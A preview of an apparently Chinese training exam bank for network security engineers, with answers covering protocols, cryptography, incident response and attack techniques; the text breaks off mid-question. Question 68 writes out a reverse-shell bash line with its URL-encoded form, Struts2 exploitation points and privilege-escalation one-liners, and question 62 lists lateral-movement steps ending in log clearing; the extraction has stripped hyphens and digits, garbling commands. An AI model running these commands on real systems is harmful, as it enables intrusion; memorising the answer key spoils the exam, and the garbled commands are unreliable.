2025年网络安全工程师培训考试题库(网络安全专题)真题及答案_第1页
2025年网络安全工程师培训考试题库(网络安全专题)真题及答案_第2页
2025年网络安全工程师培训考试题库(网络安全专题)真题及答案_第3页
2025年网络安全工程师培训考试题库(网络安全专题)真题及答案_第4页
2025年网络安全工程师培训考试题库(网络安全专题)真题及答案_第5页
已阅读5页,还剩16页未读 继续免费阅读

付费下载

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

2025年网络安全工程师培训考试题库(网络安全专题)练习题及答案一、单项选择题(每题1分,共30分。每题只有一个正确答案,请将正确选项字母填入括号内)1.在OSI七层模型中,负责端到端连接建立、维护与终止的层是()。A.网络层  B.传输层  C.会话层  D.数据链路层答案:B2.以下哪一项最能描述“零信任”安全模型的核心原则?()A.默认放行内网流量  B.先认证后连接  C.边界防火墙足够安全  D.加密即安全答案:B3.某企业采用IPSecVPN实现总部与分支互联,若使用ESP协议且启用了“加密+认证”,则ESP头在封装后的位置是()。A.原始IP头之前  B.原始IP头与新IP头之间  C.新IP头之后、TCP头之前  D.TCP头之后答案:C4.关于TLS1.3与TLS1.2握手过程,以下说法正确的是()。A.TLS1.3支持RSA密钥交换  B.TLS1.3默认启用前向保密  C.TLS1.3握手需要更多往返  D.TLS1.3不再支持AEAD算法答案:B5.在Linux系统中,若要查看当前监听在:3306的进程PID,应使用的命令是()。A.lsofi:3306  B.netstatano  C.ssltnp  D.fuserntcp3306答案:C6.针对Log4j2远程代码执行漏洞(CVE202144228),以下哪项缓解措施最直接有效?()A.升级JDK至17  B.设置Dlog4j2.formatMsgNoLookups=true  C.关闭端口443  D.禁用JNDI数据源答案:B7.在Windows日志中,事件ID4624表示()。A.账户登录失败  B.账户成功登录  C.权限提升  D.对象访问审计答案:B8.使用nmap进行SYN扫描时,若目标端口返回SYN/ACK,则扫描主机应()。A.返回RST  B.返回FIN  C.返回ACK  D.不做响应答案:A9.关于国密算法SM2,下列描述正确的是()。A.分组长度为128位  B.基于椭圆曲线离散对数难题  C.仅支持签名不支持加密  D.密钥长度固定为256位答案:B10.在OWASPTop102021中,排名第一位的是()。A.失效的访问控制  B.加密失败  C.注入  D.不安全设计答案:A11.以下哪条iptables规则可放行已建立及相关连接?()A.AINPUTmstatestateNEWjACCEPT  B.AINPUTmstatestateESTABLISHED,RELATEDjACCEPT  C.AFORWARDptcpdport22jACCEPT  D.AOUTPUTmconntrackctstateINVALIDjDROP答案:B12.在BGP安全扩展中,用于验证AS路径合法性的技术是()。A.RPKI  B.BGPsec  C.ASSET  D.RouteFlapDamping答案:A13.关于内存保护机制NXbit,下列说法正确的是()。A.可阻止栈溢出  B.可阻止堆喷射  C.可阻止代码段执行  D.可阻止数据段执行答案:D14.在Kubernetes中,NetworkPolicy资源对象依赖的底层组件是()。A.kubeproxy  B.CNI插件  C.etcd  D.containerruntime答案:B15.使用Wireshark过滤“TCP三次握手完成后首个HTTP请求”,正确的显示过滤器是()。A.tcp.flags.syn==1  B.http.requestandtcp.streameq0  C.tcp.seq==1andhttp  D.tcp.len==0andhttp答案:B16.关于AESGCM模式,以下说法错误的是()。A.提供机密性与完整性  B.需要单独的MAC算法  C.支持附加认证数据  D.可并行计算答案:B17.在Windows域环境中,若攻击者获得KRBTGT哈希,可制作()票据实现持久化。A.TGT  B.ST  C.GoldenTicket  D.SilverTicket答案:C18.以下哪项不是SDWAN安全控制的核心功能?()A.动态路径选择  B.端到端加密  C.零信任接入  D.集中策略编排答案:A19.在SQL注入中,若数据库为MySQL且过滤了空格,可替代的空白字符是()。A.//  B.0x0a  C.0x00  D.0x20答案:B20.关于DNSSEC,以下说法正确的是()。A.使用DS记录验证子区密钥  B.使用A记录签名  C.增加DNS放大攻击风险  D.依赖CA证书体系答案:A21.在Android逆向中,可动态跟踪Native层函数调用的工具是()。A.jadx  B.frida  C.apktool  D.dex2jar答案:B22.以下哪项最能描述“侧信道攻击”?()A.利用协议缺陷  B.利用密码算法数学弱点  C.利用物理泄漏信息  D.利用社会工程学答案:C23.在IPv6中,用于替代ARP的协议是()。A.NDP  B.DHCPv6  C.ICMPv6  D.MLD答案:A24.关于WAF绕过技术,以下哪项利用的是“HTTP参数污染”?()A.分块传输  B.URL编码双写  C.同一参数多次出现  D.伪造ContentType答案:C25.在勒索病毒应急响应中,首要步骤是()。A.支付赎金  B.隔离受害主机  C.恢复备份  D.通报媒体答案:B26.关于云安全责任共担模型,IaaS场景下补丁管理责任在()。A.云服务商  B.客户  C.双方各一半  D.第三方答案:B27.在Python中,可防止pickle反序列化漏洞的最佳实践是()。A.使用cPickle  B.使用yaml.safe_load  C.禁用pickle,采用JSON  D.加密pickle数据答案:C28.关于Kerberos的TGT有效期,默认最大可再生时间为()。A.10小时  B.7天  C.1个月  D.1年答案:B29.在工业控制系统中,Modbus协议默认TCP端口为()。A.502  B.44818  C.102  D.161答案:A30.以下哪项属于“拟态防御”的核心思想?()A.黑名单过滤  B.动态异构冗余  C.静态签名匹配  D.蜜罐诱骗答案:B二、多项选择题(每题2分,共20分。每题有两个或以上正确答案,多选、少选、错选均不得分)31.以下哪些属于对称加密算法?()A.SM4  B.ChaCha20  C.RSA  D.3DES  E.ECDH答案:A、B、D32.关于HTTP严格传输安全(HSTS),下列说法正确的是()。A.通过响应头StrictTransportSecurity下发  B.可阻止SSL剥离攻击  C.支持includeSubDomains参数  D.首次访问即生效无需用户输入  E.可设置preload列表答案:A、B、C、E33.在Linux提权中,以下哪些文件或命令可用于查找SUID权限程序?()A.find/perm4000  B.getcapr/  C.lsla/usr/bin  D.find/permu=s  E.stat/etc/passwd答案:A、D34.关于容器逃逸,以下哪些利用方式真实存在?()A.挂载DockerSocket  B.滥用privileged标志  C.利用dirtycow漏洞  D.利用runCCVE20195736  E.利用kubectlproxy答案:A、B、C、D35.以下哪些属于常见的云原生安全扫描工具?()A.kubebench  B.trivy  C.Clair  D.OpenSCAP  E.Nessus答案:A、B、C、D、E36.关于密码存储安全,以下哪些方案符合业界最佳实践?()A.明文存储  B.使用bcrypt+随机盐  C.使用PBKDF2+HMACSHA256  D.使用scrypt  E.使用argon2id答案:B、C、D、E37.在无线渗透中,以下哪些攻击可导致用户流量解密?()A.WPA24wayhandshake破解  B.KRACK攻击  C.EvilTwinAP  D.WPSPIN暴力  E.BlueBorne答案:A、B、C、D38.关于数据跨境传输合规,以下哪些属于中国《个人信息保护法》要求?()A.安全评估  B.认证  C.标准合同  D.自由流动  E.本地化存储答案:A、B、C、E39.以下哪些日志源可用于APT攻击溯源?()A.DNS查询日志  B.Proxy日志  C.NetFlow  D.内存转储  E.云审计日志答案:A、B、C、E40.关于硬件安全模块(HSM),下列说法正确的是()。A.提供防篡改存储  B.支持密钥生命周期管理  C.可加速SSL握手  D.支持国密算法  E.可导出私钥明文答案:A、B、C、D三、填空题(每空1分,共20分)41.在TLS握手阶段,服务端发送的证书类型通常是________证书。答案:X.509v342.使用openssl生成2048位RSA私钥的命令参数为opensslgenrsaoutkey.pem________。答案:204843.在Windows中,用于查看当前登录用户SID的命令是________。答案:whoami/user44.在IPv4报文中,若DF位置1且数据包大于MTU,则路由器会返回ICMP类型为________的差错报文。答案:3(DestinationUnreachable),代码4(FragmentationNeededandDFSet)45.在Kubernetes中,默认用于服务发现的DNS后缀是________。答案:cluster.local46.国家互联网应急中心英文缩写为________。答案:CNCERT47.在Metasploit中,用于搜索模块的命令是________。答案:search48.在SQLMap中,使用________参数可指定数据库类型为PostgreSQL。答案:dbms=postgresql49.在密码学中,DiffieHellman算法主要用于解决________问题。答案:密钥交换50.在AndroidManifest.xml中,用于声明应用可调试的标志为android:________="true"。答案:debuggable51.在Linux中,设置内核参数立即生效的命令是________。答案:sysctlp52.在Wireshark中,过滤所有HTTP状态码为500的表达式为________。答案:http.response.code==50053.在勒索病毒加密文件后,通常修改文件扩展名为________(任写一个常见扩展名)。答案:.locked54.在OWASPDependencyCheck中,扫描报告默认输出格式为________。答案:HTML55.在国密SSL协议中,推荐的密钥交换算法为________。答案:SM256.在Windows事件日志中,安全日志文件路径为________。答案:%SystemRoot%\System32\winevt\Logs\Security.evtx57.在Python中,使用________模块可安全执行系统命令并避免shell注入。答案:subprocess(withshell=False)58.在BGP路由策略中,________属性用于控制AS间路由出口选择。答案:MED(MultiExitDiscriminator)59.在IPv6地址中,________前缀表示本地链路地址。答案:fe80::/1060.在CI/CD流水线中,用于检测代码硬编码密钥的工具________(任写一个)。答案:truffleHog四、简答题(每题6分,共30分)61.简述SSL/TLS中间人攻击的原理及三种防御措施。答案:原理:攻击者通过伪造证书或劫持通信路径,分别与客户端、服务端建立独立连接,解密并转发流量,实现窃听或篡改。防御:1)客户端严格校验证书链与主机名,启用HSTS与证书固定(Pinning);2)部署DNSSEC与CAA记录,限制证书颁发;3)使用TLS1.3并启用前向保密,禁止弱算法与重协商。62.说明Windows环境下利用“令牌窃取”进行横向移动的步骤。答案:1)通过漏洞或钓鱼获取目标系统meterpreter会话;2)使用incognito模块列举可用令牌(list_tokensu);3)窃取高权限用户(如域管)令牌(impersonate_tokenDOMAIN\\User);4)利用新令牌访问域控C$共享或执行PsExec;5)清除日志并退出会话。63.列举容器镜像安全的五个检查点并给出对应工具。答案:1)基础镜像漏洞——trivy;2)Dockerfile合规——hadolint;3)密钥硬编码——truffleHog;4)镜像签名——cosign;5)运行时配置——kubebench。64.描述“域名前置(DomainFronting)”技术原理及CDN检测方法。答案:原理:利用CDN支持SNI与Host不一致,将真实恶意域名隐藏在合法域名后,绕过审查。检测:1)分析TLSSNI与HTTPHost字段不一致流量;2)统计同一IP下不同Host异常比例;3)结合威胁情报匹配已知前置域名;4)启用CDN日志实时告警。65.说明国密算法在HTTPS通信中的完整应用流程(含证书、密钥交换、对称加密)。答案:1)服务端生成SM2证书,CA使用SM3withSM2签名;2)客户端验证证书后,使用SM2公钥加密预主密钥;3)双方通过SM2密钥交换生成共享主密钥;4)使用SM4GCM对称加密会话数据,IV每次随机;5)使用SM3HMAC校验记录完整性;6)会话结束销毁临时密钥,实现前向保密。五、综合应用题(共50分)66.漏洞分析题(12分)某Web应用使用JWT(RS256)认证,公钥以文件形式硬编码在客户端JavaScript。攻击者通过目录遍历获得公钥文件。问题:1)攻击者能否伪造JWT?请说明原因。(4分)2)给出两种修复方案并比较优劣。(8分)答案:1)不能。RS256为非对称算法,公钥仅用于验证,私钥保存在服务端,攻击者无私钥无法生成合法签名。2)方案A:将算法升级为HS256,服务端统一密钥。优点:实现简单;缺点:密钥泄露风险集中,无法分布式验证。方案B:保持RS256,将公钥放入服务端受保护的JWKS端点,客户端运行时动态获取并缓存,启用HTTPS与证书固定。优点:私钥始终驻留服务端,支持密钥轮换;缺点:增加网络请求与缓存逻辑。67.应急响应题(12分)一台LinuxWeb服务器出现CPU异常高负载,netstat发现大量对外8888端口TCP连接。top显示进程名为“httpd”但路径为/tmp/httpd,psef查看PPID为1。问题:1)给出初步判断与依据。(4分)2)列出取证步骤与命令。(8分)答案:1)判断:木马伪装Apache进程,PPID为1说明被systemd或内核线程托管,可能通过rootkit隐藏父进程,属于典型后门。2)步骤:a)挂载只读镜像避免污染;b)使用busybox静态版收集进程树(busyboxpsef);c)获取/proc/<pid>/exe与cmdline,计算/tmp/httpd哈希;d)用lsofp<pid>查看打开文件与网络连接;e)用netstatanp|grep8888确认外部IP;f)用volatility分析内存,查找隐藏内核模块;g)检查cron、systemd服务、ld.so.preload;h)将样本上传VirusTotal,写入IOC告警。68.网络攻防题(14分)内网靶标:0,只允许80端口入站,已知存在Struts2S2062(CVE202131805)。要求:1)写出利用payload构造要点(不给出完整exp)。(4分)2)通过反弹shell到00:4444,给出bash一句话及url编码后结果。(4分)3)获得wwwdata权限后,列举两条提权路径并说明理由。(6分)答案:1)利用OGNL表达式注入,绕过struts.xwork.allowlist,使用(application)获取上下文,执行Runtime.getRuntime().exec()。2)bashi>&/dev/tcp/00/44440>&1,url编码:bash%20i%20%3E%26%20%2Fdev%2Ftcp%2F00%2F4444%200%3E%2613)路径A:内核提权——unamea显示Ubuntu20.04,存在CVE20214034(pkexec),下载编译后提权至root。路径B:SUID滥用——find/perm4000发现/usr/bin/python3.8有SUID,使用python3c'importos;os.setuid(0);os.system("/bin/bash")'提权。69.安全架构设计题(12分)某金融公司拟建设零信任架构,需满足:移动端接入、API开放、微服务内部通信、数据分级(敏感/普通)。问题:1)画出逻辑架构图(文字描述即可)。(4分)2)给出身份、网络、数据、计算四个维度的关键技术选型。(8分)答案:1)描述:终端→SDP客户端→身份代理(IDP)→策略引擎(PE)→API网关→微服务(Po

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论